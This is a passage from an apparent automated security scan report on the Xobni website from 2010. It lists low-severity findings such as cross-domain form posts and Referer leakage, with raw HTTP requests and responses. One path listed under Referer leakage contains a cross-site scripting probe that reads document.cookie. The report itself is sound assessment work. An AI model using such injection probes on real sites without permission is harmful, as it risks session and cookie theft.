       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/buynow?lc=en'>English</a><a href='/learnmore/mobile/buynow?lc=de'>Deutsch</a><a href='/learnmore/mobile/buynow?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return false;"
...[SNIP]...

9.10. http://www.xobni.com/learnmore/mobile/trial previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/learnmore/mobile/trial

Request 1

GET /learnmore/mobile/trial HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flearnmore%2Fmobile%2F&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/trial?lc=en'>English</a><a href='/learnmore/mobile/trial?lc=de'>Deutsch</a><a href='/learnmore/mobile/trial?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click',
...[SNIP]...

Request 2

GET /learnmore/mobile/trial HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/trial?lc=en'>English</a><a href='/learnmore/mobile/trial?lc=de'>Deutsch</a><a href='/learnmore/mobile/trial?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return false;" id=
...[SNIP]...

10. Cross-domain POST previous next
There are 2 instances of this issue:

/enterprise/sign_up
/partners/partners_signup.php

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

10.1. http://www.xobni.com/enterprise/sign_up previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise/sign_up

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

oid
retURL
first_name
last_name
email
phone
company
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
state
tfa_CampaignID
submit
tfa_dbFormId
tfa_dbResponseId
tfa_dbControl
tfa_dbVersionId

Request

GET /enterprise/sign_up HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<div class="wForm wFormdefaultWidth">
                   <form method="post" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" id="id2388121" class="labelsLeftAligned hintsSide">
                   <input type=hidden name="oid" value="00D80000000c5tu">
...[SNIP]...

10.2. http://www.xobni.com/partners/partners_signup.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/partners/partners_signup.php

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

type
oid
retURL
first_name
last_name
email
phone
company
country
00N80000004B8yu
00N80000004B8yz
00N80000004B8z4
00N80000004B8z0
00N80000004B8z5
00N80000004B8z6
00N80000004B8yv
00N80000004B8z1
00N80000004B8zE
00N80000004B8zF
00N80000004B8z2
00N80000004B8z3
00N80000004B8z8
00N80000004B8z7
00N80000004B8zU
00N80000004B8zV
00N80000004B8zW
00N80000004B8zM
00N80000004B8zY
00N80000004B8zH
00N80000004B8zI
00N80000004B8zT

Request

GET /partners/partners_signup.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<div id="leafcontent" style="position:relative;">
           <form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST">
           <input type="hidden" name="type" value="enterprise">
...[SNIP]...

11. Cross-domain Referer leakage previous next
There are 18 instances of this issue:

/
/about/
/account/
/developer/
/download
/download
/download
/enterprise
/errors/404.php
/learnmore/video
/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d
/partners
/press/testimonials
/products
/support/
/support/
/support/
/support/contact_form

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

11.1. http://www.xobni.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/?lc=en

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19983

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</h3>

       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

11.2. http://www.xobni.com/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/about/?lc=en

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://www.atomicoinvestments.com/
http://www.blackberrypartnersfund.com/
http://www.cisco.com/
http://www.firstround.com/
http://www.khoslaventures.com/

Request

GET /about/?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni, the Outloo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<p>Xobni has raised two rounds of funding from leading investors including: <a href="http://www.khoslaventures.com/">Khosla Ventures</a>, <a href="http://www.firstround.com/">First Round Capital</a>, <a href="http://www.cisco.com/">Cisco</a>, <a href="http://www.blackberrypartnersfund.com/">BlackBerry Partners Fund</a>, <a href="http://www.atomicoinvestments.com">Atomico Investments</a>
...[SNIP]...

11.3. http://www.xobni.com/account/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/account/

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/account/?action=forgot

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /account/?action=forgot HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<link rel='stylesheet' href='/csscache/1265760498/styles/account.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.4. http://www.xobni.com/developer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/developer/

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/developer/?lc=en

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://code.google.com/apis/gadgets/docs/dev_guide.html
http://code.google.com/apis/gmail/gadgets/contextual/
http://wiki.opensocial.org/index.php?title=JavaScript_API_Reference

Request

GET /developer/?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Developer Z
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://code.google.com/apis/gmail/gadgets/contextual/" target="_blank">Gmail Contextual Gadgets Developer's Guide</a>
...[SNIP]...
<li><a href="http://wiki.opensocial.org/index.php?title=JavaScript_API_Reference" target="_blank">JavaScript API Reference from opensocial.org</a>
...[SNIP]...
<li><a href="http://code.google.com/apis/gadgets/docs/dev_guide.html" target="_blank">Google Gadget Developer's Guide from Google Code</a>
...[SNIP]...

11.5. http://www.xobni.com/download previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/download?lc=en

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=1844822&TYPE=330908&CURRENCY=USD&METHOD=IMG

Request

GET /download?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</div>
<img src="https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=1844822&TYPE=330908&CURRENCY=USD&METHOD=IMG" height="1" width="20"></div>
...[SNIP]...

11.6. http://www.xobni.com/download previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/download?lc=de

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=3146091&TYPE=330908&CURRENCY=USD&METHOD=IMG

Request

GET /download?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</div>
<img src="https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=3146091&TYPE=330908&CURRENCY=USD&METHOD=IMG" height="1" width="20"></div>
...[SNIP]...

11.7. http://www.xobni.com/download previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/download?lc=fr

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=2330073&TYPE=330908&CURRENCY=USD&METHOD=IMG

Request

GET /download?lc=fr HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</div>
<img src="https://www.emjcd.com/u?AMOUNT=0&CID=1514521&OID=2330073&TYPE=330908&CURRENCY=USD&METHOD=IMG" height="1" width="20"></div>
...[SNIP]...

11.8. http://www.xobni.com/enterprise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/enterprise

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/enterprise?lc=en

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /enterprise?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

